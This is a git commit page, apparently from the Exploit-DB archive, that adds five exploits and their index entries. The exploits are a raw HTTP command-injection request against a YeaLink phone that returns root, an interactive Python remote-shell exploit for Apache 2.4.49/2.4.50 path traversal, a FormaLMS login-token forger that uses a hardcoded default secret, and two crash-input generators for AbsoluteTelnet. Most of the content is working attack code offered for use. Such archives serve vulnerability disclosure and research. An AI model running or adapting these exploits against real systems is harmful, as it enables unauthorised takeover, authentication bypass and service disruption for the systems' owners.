DB: 2021-11-12
5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass
This commit is contained in:
parent
c26eab756e
commit
5310d503ac
6 changed files with 294 additions and 0 deletions
44
exploits/hardware/webapps/50509.txt
Normal file
44
exploits/hardware/webapps/50509.txt
Normal file
|
@ -0,0 +1,44 @@
|
||||||
|
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
|
||||||
|
# Date: 11-10-2021
|
||||||
|
# Exploit Author: tahaafarooq
|
||||||
|
# Vendor Homepage: https://www.yealink.com/
|
||||||
|
# Version: 53.84.0.15
|
||||||
|
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
|
||||||
|
|
||||||
|
Description:
|
||||||
|
|
||||||
|
Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
|
||||||
|
|
||||||
|
POC:
|
||||||
|
|
||||||
|
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
Content-Length: 49
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Accept: */*
|
||||||
|
Origin: http://xxx.xxx.xxx.xxx
|
||||||
|
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: JSESSIONID=9a83d24461329a130
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
cmd=; id;&token=1714636915c6acea98
|
||||||
|
|
||||||
|
-------------------------------------------------
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: text/html
|
||||||
|
Connection: close
|
||||||
|
Date: Wed, 10 Nov 2021 14:20:23 GMT
|
||||||
|
Server: embed httpd
|
||||||
|
Content-Length: 82
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<div id="_RES_INFO_">
|
||||||
|
uid=0(root) gid=0(root)
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
</html>
|
121
exploits/multiple/webapps/50512.py
Executable file
121
exploits/multiple/webapps/50512.py
Executable file
|
@ -0,0 +1,121 @@
|
||||||
|
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
|
||||||
|
# Date: 11/11/2021
|
||||||
|
# Exploit Author: Valentin Lobstein
|
||||||
|
# Vendor Homepage: https://apache.org/
|
||||||
|
# Software Link: https://github.com/Balgogan/CVE-2021-41773
|
||||||
|
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
|
||||||
|
# Tested on: Debian GNU/Linux
|
||||||
|
# CVE : CVE-2021-41773 / CVE-2021-42013
|
||||||
|
# Credits : Lucas Schnell
|
||||||
|
|
||||||
|
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
#coding: utf-8
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import requests
|
||||||
|
from colorama import Fore,Style
|
||||||
|
|
||||||
|
|
||||||
|
header = '''\033[1;91m
|
||||||
|
|
||||||
|
▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
|
||||||
|
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
|
||||||
|
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
|
||||||
|
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
|
||||||
|
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
|
||||||
|
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
|
||||||
|
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
|
||||||
|
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
|
||||||
|
''' + Style.RESET_ALL
|
||||||
|
|
||||||
|
|
||||||
|
if len(sys.argv) < 2 :
|
||||||
|
print( 'Use: python3 file.py ip:port ' )
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
def end():
|
||||||
|
print("\t\033[1;91m[!] Bye bye !")
|
||||||
|
time.sleep(0.5)
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def commands(url,command,session):
|
||||||
|
directory = mute_command(url,'pwd')
|
||||||
|
user = mute_command(url,'whoami')
|
||||||
|
hostname = mute_command(url,'hostname')
|
||||||
|
advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
|
||||||
|
command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
|
||||||
|
command = f"echo; {command};"
|
||||||
|
req = requests.Request('POST', url=url, data=command)
|
||||||
|
prepare = req.prepare()
|
||||||
|
prepare.url = url
|
||||||
|
response = session.send(prepare, timeout=5)
|
||||||
|
output = response.text
|
||||||
|
print(output)
|
||||||
|
if 'clear' in command:
|
||||||
|
os.system('/usr/bin/clear')
|
||||||
|
print(header)
|
||||||
|
if 'exit' in command:
|
||||||
|
end()
|
||||||
|
|
||||||
|
def mute_command(url,command):
|
||||||
|
session = requests.Session()
|
||||||
|
req = requests.Request('POST', url=url, data=f"echo; {command}")
|
||||||
|
prepare = req.prepare()
|
||||||
|
prepare.url = url
|
||||||
|
response = session.send(prepare, timeout=5)
|
||||||
|
return response.text.strip()
|
||||||
|
|
||||||
|
|
||||||
|
def exploitRCE(payload):
|
||||||
|
s = requests.Session()
|
||||||
|
try:
|
||||||
|
host = sys.argv[1]
|
||||||
|
if 'http' not in host:
|
||||||
|
url = 'http://'+ host + payload
|
||||||
|
else:
|
||||||
|
url = host + payload
|
||||||
|
session = requests.Session()
|
||||||
|
command = "echo; id"
|
||||||
|
req = requests.Request('POST', url=url, data=command)
|
||||||
|
prepare = req.prepare()
|
||||||
|
prepare.url = url
|
||||||
|
response = session.send(prepare, timeout=5)
|
||||||
|
output = response.text
|
||||||
|
if "uid" in output:
|
||||||
|
choice = "Y"
|
||||||
|
print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
|
||||||
|
print("[!] Sortie:\n\n" + Fore.YELLOW + output )
|
||||||
|
choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
|
||||||
|
if choice.lower() in ['','y','yes']:
|
||||||
|
while True:
|
||||||
|
commands(url,command,session)
|
||||||
|
else:
|
||||||
|
end()
|
||||||
|
else :
|
||||||
|
print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
end()
|
||||||
|
|
||||||
|
def main():
|
||||||
|
try:
|
||||||
|
apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
|
||||||
|
apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
|
||||||
|
payloads = [apache2449_payload,apache2450_payload]
|
||||||
|
choice = len(payloads) + 1
|
||||||
|
print(header)
|
||||||
|
print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
|
||||||
|
while choice >= len(payloads) and choice >= 0:
|
||||||
|
choice = int(input('[~] Choice : '))
|
||||||
|
if choice < len(payloads):
|
||||||
|
exploitRCE(payloads[choice])
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("\n\033[1;91m[!] Bye bye !")
|
||||||
|
time.sleep(0.5)
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
51
exploits/multiple/webapps/50513.py
Executable file
51
exploits/multiple/webapps/50513.py
Executable file
|
@ -0,0 +1,51 @@
|
||||||
|
# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
|
||||||
|
# Google Dork: inurl:index.php?r=adm/
|
||||||
|
# Date: 2021-11-10
|
||||||
|
# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
|
||||||
|
# Vendor Homepage: https://formalms.org
|
||||||
|
# Software Link: https://formalms.org
|
||||||
|
# Version: <= 2.4.4
|
||||||
|
# Tested on: Linux
|
||||||
|
# CVE : CVE-2021-43136
|
||||||
|
|
||||||
|
# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
|
||||||
|
|
||||||
|
# Analysis:
|
||||||
|
https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
|
||||||
|
|
||||||
|
# Nuclei template:
|
||||||
|
https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import hashlib
|
||||||
|
|
||||||
|
secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
|
||||||
|
|
||||||
|
def help():
|
||||||
|
|
||||||
|
print(f"Usage: {sys.argv[0]} username target_url")
|
||||||
|
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
|
||||||
|
help()
|
||||||
|
|
||||||
|
user, url = (sys.argv[1], sys.argv[2])
|
||||||
|
t = str(int(time.time()) + 5000)
|
||||||
|
token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
|
||||||
|
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
|
||||||
|
print(f"URL with default secret: {final_url}")
|
||||||
|
token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
|
||||||
|
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
|
||||||
|
print(f"URL with empty secret: {final_url}")
|
37
exploits/windows/dos/50510.py
Executable file
37
exploits/windows/dos/50510.py
Executable file
|
@ -0,0 +1,37 @@
|
||||||
|
# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
|
||||||
|
# Discovered by: Yehia Elghaly
|
||||||
|
# Discovered Date: 2021-11-10
|
||||||
|
# Vendor Homepage: https://www.celestialsoftware.net/
|
||||||
|
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
|
||||||
|
# Tested Version: 11.24
|
||||||
|
# Vulnerability Type: Denial of Service (DoS) Local
|
||||||
|
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
|
||||||
|
|
||||||
|
# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
# 1. - Download and install AbsoluteTelnet
|
||||||
|
# 2. - Run the python script and it will create exploit.txt file.
|
||||||
|
# 3. - Open AbsoluteTelnet 11.24
|
||||||
|
# 4. - "new connection file -> Connection -> SSH1 & SSH2"
|
||||||
|
# 5. - Paste the characters of txt file to "Authentication -> Username"
|
||||||
|
# 6. - press "ok" button
|
||||||
|
# 7. - Crashed
|
||||||
|
# 8. - Reopen AbsoluteTelnet 11.24
|
||||||
|
# 9. - Copy the same characters to "Your Email Address (optional)"
|
||||||
|
# 10.- Click "Send Error Report" button
|
||||||
|
# 11.- Crashed
|
||||||
|
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
exploit = 'A' * 1000
|
||||||
|
|
||||||
|
try:
|
||||||
|
file = open("exploit.txt","w")
|
||||||
|
file.write(exploit)
|
||||||
|
file.close()
|
||||||
|
|
||||||
|
print("POC is created")
|
||||||
|
except:
|
||||||
|
print("POC not created")
|
36
exploits/windows/dos/50511.py
Executable file
36
exploits/windows/dos/50511.py
Executable file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
|
||||||
|
# Discovered by: Yehia Elghaly
|
||||||
|
# Discovered Date: 2021-11-10
|
||||||
|
# Vendor Homepage: https://www.celestialsoftware.net/
|
||||||
|
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
|
||||||
|
# Tested Version: 11.24
|
||||||
|
# Vulnerability Type: Denial of Service (DoS) Local
|
||||||
|
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
|
||||||
|
|
||||||
|
# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
# 1. - Download and install AbsoluteTelnet
|
||||||
|
# 2. - Run the python script and it will create exploit.txt file.
|
||||||
|
# 3. - Open AbsoluteTelnet 11.24
|
||||||
|
# 4. - "new connection file -> DialUp Connection
|
||||||
|
# 5. - Paste the characters of txt file to "DialUp -> phone"
|
||||||
|
# 6. - press "ok" button
|
||||||
|
# 7. - Crashed
|
||||||
|
# 8. - Reopen AbsoluteTelnet 11.24
|
||||||
|
# 9. - Copy the same characters to "license name"
|
||||||
|
# 10.- Click "Send Error Report" button
|
||||||
|
# 11.- Crashed
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
exploit = 'A' * 1000
|
||||||
|
|
||||||
|
try:
|
||||||
|
file = open("exploit.txt","w")
|
||||||
|
file.write(exploit)
|
||||||
|
file.close()
|
||||||
|
|
||||||
|
print("POC is created")
|
||||||
|
except:
|
||||||
|
print("POC not created")
|
|
@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
|
||||||
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
|
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
|
||||||
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
|
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
|
||||||
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
|
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
|
||||||
|
50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
|
50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
|
||||||
|
@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
|
||||||
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
|
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
|
||||||
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
|
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
|
||||||
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
|
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
|
||||||
|
50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
|
||||||
|
50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
|
||||||
|
50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue